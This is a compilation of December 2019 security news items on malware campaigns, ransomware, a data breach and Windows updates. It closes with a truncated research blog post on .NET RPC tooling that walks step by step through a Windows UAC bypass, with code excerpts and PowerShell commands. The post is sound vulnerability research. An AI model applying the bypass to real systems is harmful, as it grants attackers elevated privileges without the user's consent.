Dubbed Gangnam Industrial Style, the campaign compromised at least 200 systems. Almost 60% of the victims are in South Korea, including steel, pipes, and valves, manufacturers, an engineering company, and a chemical plant construction company.

A big player among the South Korean victims is a maker of critical infrastructure equipment supplying chemical plants, power transmission and distribution facilities, or firms in the renewable energy sector.

Companies in other countries that fit the same activity profile have also been hit, as researchers from CyberX's threat intelligence team Section 52 discovered compromised systems in Thailand (12.9%), China (5.9%), Japan, Indonesia, Turkey, Ecuador, Germany, and the U.K.

Industrial-themed phishing
The malicious emails from the attacker are specifically created for the recipient. In one of them, the sender posed as an employee of a Siemens subsidiary making a request for quote (RFQ) for designing a power plant in the Czech Republic.

The message included a diagram and a publicly available technical paper on how to run the plant on fuel gas.

In another fake RFQ, the attacker simulated interest in building a coal-fired power plant in Indonesia and pretended to be the engineering subsidiary of a major Japanese conglomerate.

A new breed of Separ malware
CyberX security researchers analyzing the malware used in the Gangnam Industrial Style campaign noticed is the Separ info-stealer, publicly documented for the first time in 2013.

However, the variant used in these attacks is an evolved one compared to the capabilities seen by malware analysts in a previous Separ version from early 2019.

In a report today, CyberX notes that the malware relies on the Autorun feature to survive system reboots and comes with a host of mostly freely available tools:

Browser Password Dump v6.0 by SecurityXploded
Email Password Dump v3.0 by SecurityXploded
NcFTPPut 3.2.5 – Free FTP client
The LaZagne Project (password dumper)
deltree (folder delete)
Command Line Process Viewer/Killer/Suspender for Windows NT/2000/XP V2.03
MOVEit Freely 1.0.0.1 – Secure FTP Client
Sleep tool by tricerat
After installation, the malware steals credentials from browsers and email clients and looks for documents that may be important for the attacker based on their file extension.

All collected data is sent using the File Transfer Protocol (FTP) to the free web hosting service freehostia[.]com.

The researchers say that the Gangnam Industrial Style campaign is still active because they are seeing stolen credentials still being delivered to the attacker's command and control server.


Ransomware Hit Over 1,000 U.S. Schools in 2019
20.12.2019
Bleepingcomputer  Ransomware

Since January, 1,039 schools across the U.S. have been potentially hit by a ransomware attack after 72 school districts and/or educational institutions have publicly reported being a ransomware victim according to a report from security solutions provider Armor.

11 of the total number of impacted U.S. school districts had their systems affected by ransomware since late October, with 226 schools being directly affected as a result.

"Of the 11 school districts hit in this last attack wave, only 1 has reported having paid the ransom, but did not disclose the sum (Port Neches-Groves), 3 reported having refused to pay (Wood County, Penn-Harris-Madison, Claremont) and 7 have not revealed whether they have paid the ransom or not," Armor's report adds.

Ransomware attacks against schools in 2019

Since the firm previously reported in September that over 500 U.S. schools were hit by ransomware since January, the number of affected schools more than doubled in under three months according to Armor's stats.

To understand the impact a ransomware attack can have when it hits a school district, just in the case of the Las Cruces Public Schools the incident led to the full shutdown of all roughly 30,000 district devices from 42 schools, as well as full hard drive wipes and operating system reinstalls.

Louisiana's Governor John Edwards also declared a state of emergency in late July following a huge wave of ransomware attacks that targeted the state's school districts.

The full list of all 11 school districts hit by ransomware since late October is available in the table embedded below.

District name City, State
Wood County Schools Parkersburg, West VA
Port Neches-Groves Independent School District Port Neches, TX
Penn-Harris-Madison School Corporation Mishawaka, IN
Livingston New Jersey School District Livingston, NJ.
Chicopee Public Schools Chicopee, MA
Claremont Unified School District Claremont, CA
Sycamore School District 427 DeKalb, IL
Maine School Administrative District #6 Buxton, ME
Lincoln County Brookhaven, MS
San Bernardino City Unified School District San Bernardino, CA
Las Cruces Public Schools Las Cruces, NM
Overall, spanning all industry sectors, Armor says that it identified public ransomware attack reports from 269 U.S. organizations since January 1, 2019, with municipalities leading in victim count with 82 reports, closely followed by educational entitities with 72.

Healthcare orgs have reportedly been impacted by 44 ransomware attacks since the start of 2019, while Managed Service Providers (MSPs) and/or Cloud-Based Service Providers publicly reported 18 ransomware incidents.

Emsisoft confirms the huge numbers
In a separate annual ransomware report published on December 12, Emsisoft says that the impacted educational organizations in 2019 included "86 universities, colleges and school districts, with operations at up to 1,224 individual schools potentially affected."

They also state that 103 state and municipal governments and agencies have also reported ransomware incidents, while healthcare providers have been hit by ransomware gangs 759 times throughout 2019.

In a breakdown by industry sectors, Emsisoft found that the healthcare sector was at the top of the list of most popular ransomware targets this year, with the roughly 759 healthcare providers that have been hit by such attacks during 2019.

Overall, the anti-malware maker says that ransomware directly impacted "at least 948 government agencies, educational establishments and healthcare providers at a potential cost in excess of $7.5 billion."

Ransomware warnings and mitigation
The Senate passed the 'DHS Cyber Hunt and Incident Response Teams Act' in September to authorize the Department of Homeland Security (DHS) to maintain incident response teams designed to provide private and public entities with help defending against ransomware and cyber-attacks.

FBI's Internet Crime Complaint Center also issued a public service announcement in October regarding the increasing number of high-impact ransomware attacks targeting public and private U.S. organizations.

The FBI advises all U.S. entities currently targeted by a heavy barrage of ransomware attacks to follow these best practices:

• Regularly back up data and verify its integrity
• Focus on awareness and training
• Patch the operating system, software, and firmware on devices
• Enable anti-malware auto-update and perform regular scans
• Implement the least privilege for file, directory, and network share permissions
• Disable macro scripts from Office files transmitted via email
• Implement software restriction policies and controls
• Employ best practices for use of RDP
• Implement application whitelisting
• Implement physical and logical separation of networks and data for different org units
• Require user interaction for end-user apps communicating with uncategorized online assets
Organizations and individuals that have been hit by ransomware are also urged not to pay the ransom but, instead, to reach out to their local FBI field office and to report the incidents to IC3 as soon as possible.

Update December 17, 17:16 EST: Added info from Emsisoft's report on the "State of Ransomware in the US."


LifeLabs Data Breach Exposes Personal Info of 15 Million Customers
20.12.2019
Bleepingcomputer  Incindent

Canadian clinical laboratory services provider LifeLabs has announced a data breach that exposed the personal information for up to 15 million Canadians after an unauthorized user gained access to their systems.

LifeLabs CEO Charles Brown apologized for the data breach that exposed customer information stored on their systems.

"Personally, I want to say I am sorry that this happened. As we manage through this issue, my team and I remain focused on the best interests of our customers. You entrust us with important health information, and we take that responsibility very seriously."

The data breach notification goes on to say that the personal data for up to 15 million customers was accessed by an unauthorized user. This information includes customer names, addresses, emails, logins, passwords, date of birth, and health card numbers.

Of these 15 million customers, approximately 85,000 customers had their lab results exposed as well.

The exposed data was reportedly from 2016 and earlier and the vast majority of these customers are from B.C. and Ontario

After discovering the breach, LifeLabs worked with third-party cybersecurity experts to secure the affected systems and purchase the stolen data from the hackers.

It is not known how much they paid for the data.

LifeLabs states that they have already notified privacy commissioners and government partners about the breach and in the "interest of transparency" are releasing the data breach announcement.

What should affected customers do?
For any customer who is concerned about the breach, LifeLabs is offering a free one-year subscription of dark web monitor and identity theft protection.

"Any customer who is concerned about this incident can receive one free year of protection that includes dark web monitoring and identity theft insurance."

BleepingComputer advises all users who are affected by this breach to take them up on their offer of free dark web monitoring subscription as it is very common for attackers to sell stolen information on underground hacker forums.

Furthermore, if you use the same password for your LifeLabs account at other sites, it is strongly advised that you change your passwords at those sites. Everyone should also only use unique passwords when registering at other sites so that a data breach at one site does not affect you at another.

BleepingComputer has reached out to LifeLabs for more information, but have not heard back as of yet.


Windows 10's Fast Ring Becomes a Microsoft Dev Playground
20.12.2019
Bleepingcomputer  OS

Microsoft officially kicks off the new Windows 10 Fast Ring with the release of their latest Insider build. Under this new Fast Ring, Insiders will always receive the latest code from Microsoft developers who are creating new features in Windows 10.

In the past, Microsoft had two rings that delivered pre-release development builds for Windows. The Fast Ring was for the next version of Windows 10 and the Skip Ahead Rings were used for testing the following feature update.

To make it easier to understand, when Insiders in the Fast Ring were testing Windows 10 version 1809, users in the Skip Ahead Ring were testing Windows 10 version 1903.

As this was causing too much confusion for users, Microsoft announced in November that they were no longer going to offer the Skip Ahead Ring and that all future preview releases containing the latest code and features would be in the Fast Ring.

"Going forward, we will not be offering Skip Ahead as an option for Insiders to sign-up for. Our goal is to provide everyone in the Fast ring the freshest builds at the same time."

Starting yesterday, with the release of the Windows 10 v2004 Insider Build 19536, Microsoft clarified their plans for the Fast Ring going forward.

Windows 10 v2004 Build 19536
Windows 10 v2004 Build 19536
According to Microsoft, the Fast Ring will always contain the freshest code and newest features, but these features are not matched towards a specific Windows 10 release. Instead, these features will only be released when they are ready, if at all.

"While features in the active development branch may be slated for a future Windows 10 release, they are no longer matched to a specific Windows 10 release. This means that builds from the active development branch simply reflect the latest work in progress code from our engineers. New features and OS improvements done in this branch during these development cycles will show up in future Windows 10 releases when they are ready. And we may deliver these new features and OS improvements as full OS build updates or servicing releases."

For example, the Windows 10 tabbed window feature called Sets was actively being developed by Microsoft, but they later decided to pull it from the Windows 10 October 2018 Update (Redstone 5) builds that Insiders were testing. It is not known when this feature will make it back into Windows 10 development builds.

The retiring of the Skip Ahead and the use of the Fast Ring for all pre-release features and code, makes it much less confusing for Insiders.

This change also allows all Insiders to test new features, rather than just the Skip Ahead Ring, which had a limited amount of slots available.


Chinese Rancor APT Refreshes Malware Kit for Espionage Attacks
20.12.2019
Bleepingcomputer  APT

A Chinese-linked hacking group deployed a new malware strain dubbed Dudell as part of attacks targeting Cambodian government organizations between December 2018 and January 2019.

The threat group tracked as Rancor by Palo Alto Networks' Unit 42 is known to have operated highly-targeted cyber-espionage campaigns against other targets from South East Asia, including but not limited to Cambodia and Singapore since at least 2017.

This is not the first time Rancor was spotted using previously unknown custom malware as Unit 42 also previously observed them making use of the DDKONG and PLAINTEE families throughout attacks carried out in 2017 and 2018.

Custom malware used against government orgs
"Between early December 2018 and the end of January 2019, Rancor conducted at least two rounds of attacks intending to install Derusbi or KHRat malware on victim systems," Unit 42 says.

The DUDELL sample discovered by Unit 42 features similar malicious behavior to another malware sample connected to Rancor found by Check Point researchers while observing a campaign against several Southeast Asian government entities that span over seven months.

Rancor malware malicious behavior
Rancor malware malicious behavior (Check Point)
This malware downloader was delivered in the form of a decoy Microsoft Excel document designed to run malicious macros on the target's computer with the end goal of downloading and executing a second stage malware payloads.

"The macro in this document gets executed when the user views the document and clicks Enable Content, at which point the macro locates and executes the data located under the Company field in the document’s properties," the researchers add.

A custom obfuscated VBScript named Chrome.vbs was also used by the Rancor group hackers in attacks from July 2019 to infect their targets with "multiple chained persistent artifacts" to gain persistence on the compromised computers.

VBScript payload execution flow
VBScript payload execution flow (Unit 42)
Second stage malware payloads
As a second stage payload, the downloader will drop a DDKONG payload that will exfiltrate XOR encoded victim info including hostname, IP address, and locale, as well as various other OS information.

The DDKONG malware can terminate processes on the compromised hosts, list folder contents, download and upload files, execute commands, take screenshots, and even act as a reverse shell to provide the attackers with remote access to the infected systems.

DUDELL was also observed while delivering KHRAT payloads that also come with reverse shell capabilities, as well as Derusbi backdoor Trojans that will load additional modules to augment its functionality.

Unit 42 provides a list of indicators of compromise (IOCs) including command and control server addresses and malware sample SHA256 hashes at the end of their Rancor report.


Lazarus Hackers Target Linux, Windows With New Dacls Malware
20.12.2019
Bleepingcomputer  APT  Virus

A new Remote Access Trojan (RAT) malware dubbed Dacls and connected to the Lazarus Group has been spotted by researchers while being used to target both Windows and Linux devices.

The RAT is used by North Korea's state-backed Lazarus Group as security researchers at Qihoo 360 Netlab who discovered it speculate in their report.

The threat group (also tracked as HIDDEN COBRA by the United States Intelligence Community and Zinc by Microsoft) is known for hacking Sony Films during late 2014 as part of Operation Blockbuster and for being behind the 2017 global WannaCry ransomware epidemic.

First Linux malware linked to Lazarus
While they are known for targeting both Windows [1, 2, 3] and macOS [1, 2] targets, this is the first time they are connected to malware capable of infecting and abusing Linux devices.

"At present, the industry has never disclosed the Lazarus Group's attack samples and cases against the Linux platform," the Qihoo 360 Netlab researchers state.

"And our analysis shows that this is a fully functional, covert and RAT program targeting both Windows and Linux platforms, and the samples share some key characters being used by Lazarus Group."

The researchers linked the newly discovered dual-platform RAT to the Lazarus Group hackers based on the thevagabondsatchel[.]com download server the APT group also employed in past campaigns, as shown by open source threat intelligence data [1, 2] and malware analysis reports [1, 2].

Dacls connections to Lazarus Group
Dacls connections to Lazarus Group
Modular and cross-platform RAT
The malware is modular and it is capable of dynamically loading plug-ins remotely on compromised Windows servers, while the Linux version bundles all the plug-ins it needs to function within the bot component.

Dacls uses TLS and RC4 double-layer encryption for securing its command and control (C2) communication channels, it encrypts its configuration file using AES encryption, and it also comes with C2 instruction dynamic update capabilities.

Researchers discovered both Windows and Linux Dacls malware samples on an opendir download server, together with an exploit payload for Atlassian Confluence Server installations vulnerable to attacks against the CVE-2019-3396 RCE bug.

This hints at the Lazarus Group hacking outfit potentially using the CVE-2019-3396 vulnerability to spread Dacls malware payloads on unpatched Confluence servers.

Malware samples found on the download server
Malware samples found on the download server

Reverse P2P plug-in used to hide Lazarus infrastructure
Dacls' plug-ins provide it with a large array of features including but not limited to receiving and executing C2 commands, file management and additional data downloading from the C2 server, process management, random network scans on the 8291 port, and network connectivity testing.

"We are not sure why TCP 8291 is targeted, but we know that the Winbox protocol of the MikroTik Router device works on TCP / 8291 port and is exposed on the Internet," the report says.

The RAT also features a reverse P2P plug-in that acts as a C2 Connection Proxy that routes traffic between bots and the C2 server to avoid direct connections to operators' infrastructure.

"This is a commonly used technique by the Lazarus Group. With connection proxy, the number of target host connections can be reduced, and the communication between the target and the real C2 can be hidden," the researchers explain.

"In some cases, an infected intranet host can be used to further penetrates into the isolated network segment."

The Qihoo 360 Netlab research team recommends Confluence users to patch their system as soon as possible to avoid having their servers compromised in attacks attempting to infect them with this RAT.

They also provide a list of indicators of compromise (IOCs) related to the malware strain at the end of their Dacls report.


How to Block Windows 10 Update Force Installing the New Edge Browser
20.12.2019
Bleepingcomputer  OS

When Microsoft Edge reaches general availability in January, Microsoft has stated that the browser will automatically be installed on Windows 10 devices via Windows Update.

On January 15th, 2020, Microsoft plans on officially releasing the new Microsoft Edge browser and has decided to push it out via Windows Update rather than having it be a manual download.

When the new browser is installed, it will replace the existing Microsoft Edge browser on the device, which for many is a good thing as it will provide far greater compatibility with web sites and increased performance.

For organizations, though, that use web sites built for Microsoft Edge's EdgeHTML rendering engine, this forced installation may be something they do not want.

To accommodate these enterprise users, Microsoft has released a support document and a tool called the Microsoft Edge Blocker Toolkit that can be used to create a Registry value that blocks the automatic delivery of the new Microsoft Edge.

"To help our customers become more secure and up-to-date, Microsoft will distribute Microsoft Edge (Chromium-based) through Automatic Updates for Windows 10 RS4 and newer. The Blocker Toolkit is intended for organizations that would like to block automatic delivery of Microsoft Edge (Chromium-based) to machines in environments where Automatic Updates is enabled. The Blocker Toolkit will not expire."

Microsoft states that this Registry value is only available on Windows 10 RS4 (version 1803) or newer and only blocks installs of Microsoft Edge using Windows Update.

For computers running Windows 10 RS4 and newer, the Blocker Toolkit prevents the machine from receiving Microsoft Edge (Chromium-based) via Automatic Updates.
The Blocker Toolkit will not prevent users from manually installing Microsoft Edge (Chromium-based) from internet download, or from external media.
Organizations do not need to deploy the Blocker Toolkit in environments managed with an update management solution such as Windows Server Update Services or System Center Configuration Manager. Organizations can use those products to fully manage deployment of updates released through Windows Update and Microsoft Update, including Microsoft Edge (Chromium-based), within their environment.
The Blocker Toolkit includes HTML instructions, a CMD script, and Group Policy templates that can be used to control the automatic delivery of the new Microsoft Edge browser, which we will discuss in the next section.

Blocking Edge from being installed by Windows Update
Microsoft has added a new Registry value to Windows 10 that blocks the automatic install of the new Microsoft Edge.

This new value needs to be created under the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EdgeUpdate key and is called DoNotUpdateToEdgeWithChromium.

If this value is set to 1, Edge will be blocked via Windows Update and if it's set to 0 or missing, Edge will be automatically installed.

Below we have provided three methods that users can use to create this Registry value on a Windows device.

Method 1: Directly modify the Registry
For users who are comfortable modifying the Windows Registry, the easiest method is to just create the DoNotUpdateToEdgeWithChromium Registry value key manually or through the registry file shown below.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EdgeUpdate]
"DoNotUpdateToEdgeWithChromium"=dword:00000001

To use a Registry file to make the change, simply follow these steps:

Open Notepad and copy and paste the contents of the above Registry file into the Notepad.
Save the file as BlockAutoEdge.reg on your Windows Desktop.
Double-click on the file and let Windows merge the data.
This will cause the DoNotUpdateToEdgeWithChromium Registry value to automatically be created and set to 1 as shown below.

DoNotUpdateToEdgeWithChromium Registry value created

DoNotUpdateToEdgeWithChromium Registry value created
DoNotUpdateToEdgeWithChromium Registry value created
If you do not feel comfortable creating the above Registry file, you can download it from here.

Method 2: Use the Microsoft Edge Blocker Toolkit
Microsoft has released the Microsoft Edge Blocker Toolkit, which automates the creation of the Registry value on a local or remote computer.

To use the tool, simply download the program and execute it to extract the enclosed files to a folder. The extracted files will consist of a Group Policy template, HTML instructions, and a CMD script called EdgeChromium_Blocker.cmd.

To use EdgeChromium_Blocker.cmd, open an elevated command prompt, cd into the directory you extracted the files, and then execute the EdgeChromium_Blocker.cmd script to see the help screen shown below.

MICROSOFT TOOL KIT TO DISABLE DELIVERY OF
MICROSOFT EDGE (CHROMIUM-BASED)

Copyright (C) Microsoft Corporation. All rights reserved.

This tool can be used to remotely block or unblock the delivery of
Microsoft Edge (Chromium-based) via Automatic Updates.

------------------------------------------------------------
Usage:
EdgeChromium_Blocker.cmd [machine name] [/B] [/U] [/H]
B = Block Microsoft Edge (Chromium-based) deployment
U = Allow Microsoft Edge (Chromium-based) deployment
H = Help

To block or unblock installation on the local machine use
period ("." with no quotes) as the machine name

Examples:
EdgeChromium_Blocker.cmd mymachine /B (blocks delivery on machine "mymachine")

EdgeChromium_Blocker.cmd /U (unblocks delivery on the local machine)
------------------------------------------------------------
To block the automatic installation of Microsoft Edge, you would execute the "EdgeChromium_Blocker.cmd /B" command.

To unblock the installation of Microsoft Edge, you would execute the "EdgeChromium_Blocker.cmd /U" command.

Method 3: Use Edge Group Police templates
The final method that can be used to block the automatic installation of the Chromium-based Microsoft Edge is to download the Microsoft Edge Blocker Toolkit and install it.

After extracting the files, copy the EdgeChromium_Blocker.adml file to the C:\Windows\PolicyDefinitions folder and the EdgeChromium_Blocker.admx file to the C:\Windows\PolicyDefinitions\en-us folder.

You can now open the Group Policy Editor and a new policy called "Do not allow delivery of Microsoft (Chromium-based) through Automatic Updates" will be available under the following folder:

/Computer Configuration
/Administrative Templates
/Windows Components
/Windows Update
/Microsoft Edge (Chromium-based) Blockers
This new policy can be seen in the policy editor below.

New Microsoft Edge policy

New Microsoft Edge policy
New Microsoft Edge policy
When enabled, the Group Policy Editor will automatically add the DoNotUpdateToEdgeWithChromium value to the Registry.


Calling Local Windows RPC Servers from .NET
19.12.19  Exploit blog  Project Zero

As much as I enjoy finding security vulnerabilities in Windows, in many ways I prefer the challenge of writing the tools to make it easier for me and others to do the hunting. This blog post gives an overview of using some recent tooling I’ve released as part of my sandbox analysis project to access Local RPC servers on Windows from .NET. I’ll provide a worked example of using the tooling from PowerShell to exploit a novel and previously undocumented UAC bypass.

I’m not going to go into much detail about the challenges and decisions I faced implementing my tooling, for that I would recommend my presentation on this topic that I made at the HITB Abu Dhabi and the Power of Community 2019 conferences. Slides are here, hopefully a video will be made available by one or other of the conferences at a future date.
Background
If you go through many of my recent security reports in the issue tracker you’ll notice that I almost exclusively write my proof-of-concepts (POCs) in C#. I’m proficient in C++ but I find that C# just gives me the edge when writing programs to exploit complex logical flaws in the OS. To that end I consolidate a lot of my OS research into improving my NtApiDotNet library, which for my POCs can be trivially referenced from NuGet. I see writing proof-of-concepts in C# as having many advantages in terms of reliability, reducing effort and by offloading to an external library it simplifies the code to what’s important for the vendor to make an assessment.

Not everything can be written in C# (or .NET generally) and one of my big blind spots was anything which directly interacted with a Local RPC server. The primary reason for this blind spot is the tooling provided by Microsoft to generate clients only emits C code. I can’t write up an Interface Definition Language (IDL) file and generate a C# client directly.

Sometimes I get lucky and Microsoft provides a DLL on the system which directly exposed the API. For example when I was researching the Data Sharing Service I discovered that the OS also shipped the DSCLIENT DLL which mapped calls one to one with the RPC service. I could then use P/Invoke to call the DLL directly, at least once I’d figured out the undocumented API. The problem with this approach is it doesn’t scale. There’s no requirement for Microsoft to have made available a general purpose DLL to access the service, in fact the majority of RPC clients will be embedded directly in the executables which interact with the service.

You could compile the generated C code into your own DLL and call that from .NET (or use the mixed-mode C++/CLI) but I wanted a pure managed code solution. Also after much investigation I came to the conclusion that calling the OS RPC runtime (RPCRT4.DLL) which implements the underlying client code via P/Invoke was going to be complex, and error prone. Writing my own implementation seemed to be the best option.

There would be a number of advantages to a pure managed .NET implementation of a Local RPC client. For example you could eliminate almost all direct calls to native code (except to the low-level kernel calls). This makes fuzzing a server safer over using a C client, because the worst thing to happen would be generating an exception which could be caught if an invalid value is passed to the client. Also as the .NET compiler generates significant metadata into compiled assemblies you can use reflection to extract information about methods and structures at runtime. You could use this metadata to generate the fuzzed data.
Has it Been Done Before?
Before jumping into such a complex project as writing my own Local RPC client I asked, has someone already developed a .NET based RPC client before? Even asking that isn’t a simple question as there’s really two parts I needed to write:
Tool to extract the information from existing RPC servers to generate a client.
A Local RPC client implementation.
Here’s some of the tooling and libraries that I investigated during the process but ultimately rejected, however they’re still useful in their own right:
RPC View
This is a screenshot of RPC View. The tool has four sections. The upper left section shows the endpoints, the upper right shows the processes currently running, the lower left shows the interfactes by PID and UUID and the bottom right shows procedures, with indexes and addresses.

RPC View is an amazing tool to inspect what RPC servers are currently running. It’s all driven through a GUI (as shown above), you can select a process or an RPC endpoint and inspect what functions are available. Once you’ve found an RPC server of interest you can then use the tool’s inbuilt decompiler to generate an IDL file which can be recompiled with the existing Microsoft tooling. This would get me close to the first requirement, extracting RPC server information, although we’d still need to get from an IDL file to a .NET client.

RPC View was originally closed source, but in 2017 was opened up and put on Github. However, it’s all written in C/C++ so couldn’t be easily used in a .NET application and the IDL generation is incomplete (such as missing support for system handles and some structure types) and not ideal for our purposes as parsing a text format would be more complicated.
RPCForge
This picture is the title slide of the presentation of ALPC-RPC. The text reads "ALPC-RPC", Clément Rouault & Thomas Imbert, PacSec, November 2017".

The RPCForge project was developed by Clément Rouault and Thomas Imbert as part of their presentation at PacSec on Local RPC. The presentation is a great resource if you want to understand how Local RPC uses an in-built undocumented kernel feature called Advanced Local Procedure Calls (ALPC), and provides useful information on building your own Local RPC client using ALPC. The RPCForge project is a fuzzer for RPC client interfaces, it relies on a separate project PythonForWindows for the Local RPC implementation.

A cursory glance of the code should make one issue self-evident, it’s written in Python which doesn’t really help in my goals of a .NET managed client. I could attempt to use IronPython (a .NET implementation of Python 2.7) to run the code, but that adds massive additional complexity for little benefit. It might be possible to write a code converter but that would take more effort than just writing a new implementation. Also the tooling to generate clients from existing RPC servers was never released (it was based on RPC View), making the existing code even less useful other than as a reference.
SMBLibrary
The final tool I’ll mention is the SMBLibrary project. This is an underappreciated .NET library which implements the Server Message Block (SMB) protocol, versions 1 through 3. As part of the library a simple Named Pipe-based RPC client has been implemented.

The library is written in C# and so would be directly useful for my purposes. Unfortunately the RPC client implementation is very basic, only supporting the bare minimum of functionality needed for a few common RPC servers. The protocol used for Local RPC is not the same as that used for Named Pipes requiring a new implementation to be developed. The project also doesn’t contain any tooling to generate clients.

If you ever need to do security testing against SMB servers and you want to use a .NET language I’d highly recommend using this library. However, for our purposes it doesn’t meet the bar.
The Implementation
The implementation I developed is all available in the Sandbox Analysis Tools Github repository. The implementation contains classes to load DLLs/EXEs and extract RPC server information to a .NET object. It also contains classes to marshal data using the Network Data Representation (NDR) protocol as well as the Local RPC client code. Finally I implemented a client generator which takes in the parsed RPC server information and generates a C# source code file.

The simplest way of accessing these features is to install my NtObjectManager PowerShell module which exposes various commands to extract RPC server information as well as generating and connecting the RPC client. I’ll demonstrate these commands through a worked example.
Worked Example - UAC Bypass
As a worked example I wanted to pick a bug which can only be accessed by directly calling an RPC service. It’d also be useful if it was currently unpatched as that allows it to be easily demonstrated on a stock installation of Windows. Of course I can’t detail a real unpatched security vulnerability. However I can publish details if it’s not an issue that Microsoft consider a security boundary as they would not commit to fixing the issue in a security bulletin and there already exists unpatched public UAC bypasses which provide similar capabilities.

The full implementation of UAC, an RPC server exposed by the APPINFO service, is hidden from users through the ShellExecute APIs which means if the bug is in the service interface there’s no other way of exploiting it without directly calling the RPC server. It’s worth noting that Clément and Thomas’s talk at PacSec also presented a UAC bypass due to handling of the command line parsing. What I’m going to detail here is a different bug entirely.
Overview
The RPC server in APPINFO has the Interface ID of 201ef99a-7fa0-444c-9399-19ba84f12a1a and version 1.0. The main RPC function you call in the server is RAiLaunchAdminProcess as shown below (unimportant details omitted):

struct APP_PROCESS_INFORMATION {
unsigned __int3264 ProcessHandle;
unsigned __int3264 ThreadHandle;
long ProcessId;
long ThreadId;
};

long RAiLaunchAdminProcess(
handle_t hBinding,
[in][unique][string] wchar_t* ExecutablePath,
[in][unique][string] wchar_t* CommandLine,
[in] long StartFlags,
[in] long CreateFlags,
[in][string] wchar_t* CurrentDirectory,
[in][string] wchar_t* WindowStation,
[in] struct APP_STARTUP_INFO* StartupInfo,
[in] unsigned __int3264 hWnd,
[in] long Timeout,
[out] struct APP_PROCESS_INFORMATION* ProcessInformation,
[out] long *ElevationType
);

The majority of the parameters for this function are similar to the CreateProcessAsUser API which is used by the service to start the new UAC process. The most interesting parameter is CreateFlags. This flag parameter is directly mapped to the dwCreateFlags parameter for CreateProcessAsUser. Other than verifying the caller passed CREATE_UNICODE_ENVIRONMENT, all other flags are passed as is to the API. Are there any interesting flags? Yes, DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS automatically enable debugging on the new UAC process.

If you read my previous blog post on abusing the user-mode debugger you might see where this is going. If we can enable debugging on an elevated UAC process and get a handle to its debug object we can request the first debug event which will return a full access handle to the process. This trick works even if we wouldn’t normally be able to open the process directly for that level of access. We’d still need to get access to a handle to the debug object. To get a handle there’s a NtQueryInformationProcess information class you can request (ProcessDebugObjectHandle) once you’ve got a handle to an elevated process.

Unfortunately there’s a problem, accessing the debug object handle for a process requires having the PROCESS_QUERY_INFORMATION access right on the process handle. Due to security limits we’ll only get PROCESS_QUERY_LIMITED_INFORMATION access for the elevated process handle returned in the APP_PROCESS_INFORMATION::ProcessHandle structure field. This means we can’t just create an elevated process and open the debug object.

What can we do to still exploit it? The important thing to note is the debug object is created automatically inside the CreateProcessAsUser API by calling the following function exported by NTDLL.

NTSTATUS DbgUiConnectToDbg() {
PTEB teb = NtCurrentTeb();
if (teb->DbgSsReserved[1])
return STATUS_SUCCESS;

OBJECT_ATTRIBUTES ObjAttr{ sizeof(OBJECT_ATTRIBUTES) };
return ZwCreateDebugObject(&teb->DbgSsReserved[1], DEBUG_ALL_ACCESS,
&ObjAttr, DEBUG_KILL_ON_CLOSE);
}

The handle to the debug object is stored inside a reserved field of the TEB. This makes sense, as the CreateProcessAsUser and the WaitForDebugEvent APIs do not allow the caller to specify an explicit debug object handle. Instead waiting for debug events must occur only on the same thread that created the process. The result is all processes created on the same thread with a debugging flag share the same debug object.

Going back to the RAiLaunchAdminProcess method the StartFlags parameter is not passed to the CreateProcessAsUser API, instead it’s used to modify the behavior of the RPC method. It takes a number of different bit flags. The most important flag is in bit 0, if the bit is set the new process will be elevated otherwise the process will not be elevated. Crucially, if the process isn’t elevated we would have enough access to open a handle to the process’ debug object, which could be shared with a subsequent elevated process. To exploit this issue we can follow these steps:

Create a new non-elevated process through RAiLaunchAdminProcess with StartFlags set to 0 and the DEBUG_PROCESS create flag set. This will initialize the debug object field in the TEB of the RPC thread in the server and assign it to the new process.
Open a handle to the debug object using NtQueryInformationProcess with the returned process handle.
Detach the debugger and terminate the new process as it’s no longer needed.
Create a new elevated process through RAiLaunchAdminProcess with StartFlags set to 1 and the DEBUG_PROCESS create flag set. As the debug object field in the TEB is already initialized the existing object captured in step 2 is assigned to the new process.
Retrieve the initial debug event which will return a full access process handle.
With the new process handle code can be injected into the elevated process completing the UAC bypass.

There’s a few things to note about this exploit. Firstly, there’s no guarantee that the same thread will be used for each call to RAiLaunchAdminProcess. The RPC server code uses a thread pool and could dispatch the call on a different thread, this means the debug object created in step 1 might not be the same as assigned in step 4. You can mitigate this somewhat by repeating step 1 multiple times to try to initialize a debug object for all pool threads, capturing a handle to each one. You could be reasonably confident the process created in step 4 will share one of the captured debug objects.

Secondly you’ll still get the UAC prompt when elevating the process in step 4, however the default settings for Windows allow for select Windows binaries to be automatically elevated without a prompt. In a default installation you could spawn one of these Windows binaries, such as the Task Manager, and not see a prompt. As the bug we’re exploiting is in the service, not the process we’re creating we’re free to pick any executable we like.

I should point out that the pattern of behavior where a process can be created in a debugged state is repeated in other APIs. For example the WMI Win32_Process class’ Create method takes a Win32_ProcessStartup object where you can specify these same debug process flags. However, I couldn’t see a way of exploiting this behavior, but maybe someone else can?
Using PowerShell to Exploit
Finally we get to using my tools to exploit this UAC Bypass. We’ll use the NtObjectManager PowerShell module as that’d be the quickest approach, but you could do it only with C# if you wanted to. For each step I’ll outline the code you’ll want to run inside the PowerShell command shell.

Step 1: Install the NtObjectManager module from the PowerShell gallery for the current user. You’ll also need to set the PowerShell execution policy to allow for unsigned scripts to run. Note if you already have NtObjectManager installed and you want to ensure you have the latest version run the Update-Module command instead.

Install-Module "NtObjectManager" -Scope CurrentUser

Step 2: Parse the APPINFO.DLL service executable to extract all RPC servers from the DLL then filter everything but the RPC server we’re interested in based on the Interface ID. Optionally you can add the -DbgHelpPath parameter to Get-RpcServer to point to a copy of DBGHELP.DLL from Debugging Tools for Windows to resolve method names using public symbols. In this case we’ll use an alternative approach in step 3 to ensure the function has the correct name.

$rpc = Get-RpcServer "c:\windows\system32\appinfo.dll" `
| Select-RpcServer -InterfaceId "201ef99a-7fa0-444c-9399-19ba84f12a1a"

Step 3: Rename some specific parts of the RPC server interface. The parsed RPC server objects have mutable name strings for method names, parameters, structure fields etc. While it’s not necessary to do this step it makes the rest of the code easier to follow. The names can be assigned manually or you can use an XML file with the name information. You can generate a full XML file for a server using Get-RpcServerName function then edit it. The following is a simple example XML file which will rename the select parts:

<RpcServerNameData
xmlns="http://schemas.datacontract.org/2004/07/NtObjectManager">
